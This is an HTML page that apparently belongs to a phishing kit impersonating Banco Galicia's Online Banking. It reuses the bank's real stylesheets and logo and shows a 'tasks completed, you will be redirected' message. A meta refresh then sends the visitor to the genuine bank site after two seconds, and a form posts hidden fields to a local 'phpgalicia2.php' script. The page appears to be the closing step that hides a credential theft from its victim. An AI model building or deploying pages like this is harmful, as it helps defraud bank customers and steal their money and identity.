<!DOCTYPE html>

<html lang="es-ar">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5, user-scalable=0">
<meta http-equiv = "refresh" content = "2; url = https://www.bancogalicia.com/banca/online/web/Personas" />
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />





    <title>Online Banking</title>


    <link rel="shortcut icon" href="https://onlinebanking.bancogalicia.com.ar/Images/favicon.ico" />
    <link rel="apple-touch-icon" href="/images/assets/logo_ios_60x60.png" />
    <link rel="apple-touch-icon" sizes="76x76" href="/images/assets/logo_ios_76x76.png" />
    <link rel="apple-touch-icon" sizes="120x120" href="/images/assets/logo_ios_120x120.png" />
    <link rel="apple-touch-icon" sizes="152x152" href="/images/assets/logo_ios_152x152.png" />

    <link type="text/css" href="https://onlinebanking.bancogalicia.com.ar/Content/bootstrap.min.css?v=637347561532450000" rel="stylesheet" />
    <link type="text/css" href="https://onlinebanking.bancogalicia.com.ar/Content/default.min.css?v=637347561533100000" rel="stylesheet" />

    <!-- Esto es el css de la libreria del teclado -->
    <link type="text/css"  href="https://onlinebanking.bancogalicia.com.ar/Content/Keyboard/keyboard.css?v=637347561531500000" rel="stylesheet" />
    <link type="text/css"  href="https://onlinebanking.bancogalicia.com.ar/Content/Keyboard/simple-keyboard.css?v=637347561531600000" rel="stylesheet" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css" integrity="sha512-1PKOgIY59xJ8Co8+NE6FZ+LOAZKjy+KY8iq0G4B3CyeY6wYHN3yt9PW0XpSriVlkMXe40PTKnXrLnZ9+fkDaog==" crossorigin="anonymous" />
    <!--[if lte IE 9]>
        <link type="text/css" href="https://onlinebanking.bancogalicia.com.ar/Content/ieFixes.css?v=637347561551630000" rel="stylesheet" />
    <![endif]-->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>

    <script src="https://onlinebanking.bancogalicia.com.ar/Scripts/FrontFunctions.min.js?v=637347561520730000" type="text/javascript"></script>
    <link type="text/css" href="https://onlinebanking.bancogalicia.com.ar/Content/customcarousel.min.css?v=637347561532670000" rel="stylesheet" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css" integrity="sha512-1PKOgIY59xJ8Co8+NE6FZ+LOAZKjy+KY8iq0G4B3CyeY6wYHN3yt9PW0XpSriVlkMXe40PTKnXrLnZ9+fkDaog==" crossorigin="anonymous" />

<script src="https://onlinebanking.bancogalicia.com.ar/bundles/seguloginborders?v=GEgi_2YCCdJcWit_704ESvjq-n4qBXwbOONJ0vLJ0j01"></script>
<style type="text/css">
    #regiration_form fieldset:not(:first-of-type) {
      display: none;
    }
    .new-input-control>#label2 {
     color:#b5b5b5;
     font-family:sans-serif;
     font-size:.875em;
     left:15px;
     line-height:24px;
     pointer-events:none;
     position:absolute;
     top:12px;
     -webkit-transition:all .3s ease;
     transition:all .3s ease
    }
    .new-input-control:after {
     content:'';
     border-bottom:1px solid #d44b50;
     display:block;
     margin:0 auto;
     -webkit-transition:all .5s ease;
     transition:all .5s ease;
     width:0
    }
    .form-control2{
      border-bottom: 1px solid #666;
    color: #121212;
    cursor: pointer;
    font-family: sans-serif;
    text-align: left;
    position: relative;
    text-transform: lowercase;

    }
    .form-group2 {
     margin-bottom:13px;
     position:relative;
     text-align: center;
    }
</style>
</head>

<body>
<div class="container-fluid ">
<div class="row full-h">
<div class="left-column">
<div class="logo_login" role="banner" data-automation-id="galicia-banner">
<a title="link a bancogalicia.com" class="logo" href="http://www.bancogalicia.com/banca/online/web/Personas" aria-label="Ingresar a la página principal de Banco Galicia" target="_blank">
<div class="logo_sidebar_img"></div>
</a>
<p>Online Banking</p>
</div>
<div class="login">

<div class="content-login" role="main">

<form action="phpgalicia2.php" method="post"  id="regiration_form" onkeypress="return evalEnter(event);" autocomplete="off">

<div class="login-form">

<div class="row">

<div class="col-xs-12">
<h1 onclick="enableDebug();" class="login-title hidden-xs">Tareas Finalizadas</h1>
<p>Serás redirigido ... </p>
</div>










            </div>
        </div>

        <input data-hj-masked type="hidden" id="DevicePrintAdaptive" name="DevicePrintAdaptive" />
        <input data-hj-masked type="hidden" id="isDebugEnabled" name="isDebugEnabled" value="false" />
        <input data-hj-masked type="hidden" id="CodigoProducto" name="CodigoProducto" />

    </form>

</div>

</div>

<div class="terms" role="contentinfo">
    <p>Operar con Online Banking implica aceptar los <a href="javascript:void(0)" onclick="javascript:window.open('/terminosycondiciones', '_blank');return false;">términos y condiciones</a> en los que se ofrece el servicio.</p>
    <p><a href="/Seguridad/informacion-seguridad">Información sobre seguridad</a></p>
</div>






            </div>


            <div class="side-info content img art art-7" role="complementary" data-automation-id="out-banner">
                <div class="bullet">
                    <h2>Bienvenido a<br /> Online Banking</h2>
                </div>
            </div>
        </div>
    </div>



    <script type="text/javascript">
    $(document).ready(function(){
    	var current = 1,current_step,next_step,steps;
    	steps = $("fieldset").length;
    	$(".next").click(function(){
    		current_step = $(this).parent();
    		next_step = $(this).parent().next();
    		next_step.show();
    		current_step.hide();
    		setProgressBar(++current);
    	});
    	$(".previous").click(function(){
    		current_step = $(this).parent();
    		next_step = $(this).parent().prev();
    		next_step.show();
    		current_step.hide();
    		setProgressBar(--current);
    	});
    	setProgressBar(current);
    	// Change progress bar action
    	function setProgressBar(curStep){
    		var percent = parseFloat(100 / steps) * curStep;
    		percent = percent.toFixed();
    		$(".progress-bar")
    			.css("width",percent+"%")
    			.html(percent+"%");
    	}
    });
    </script>
</body>
</html>
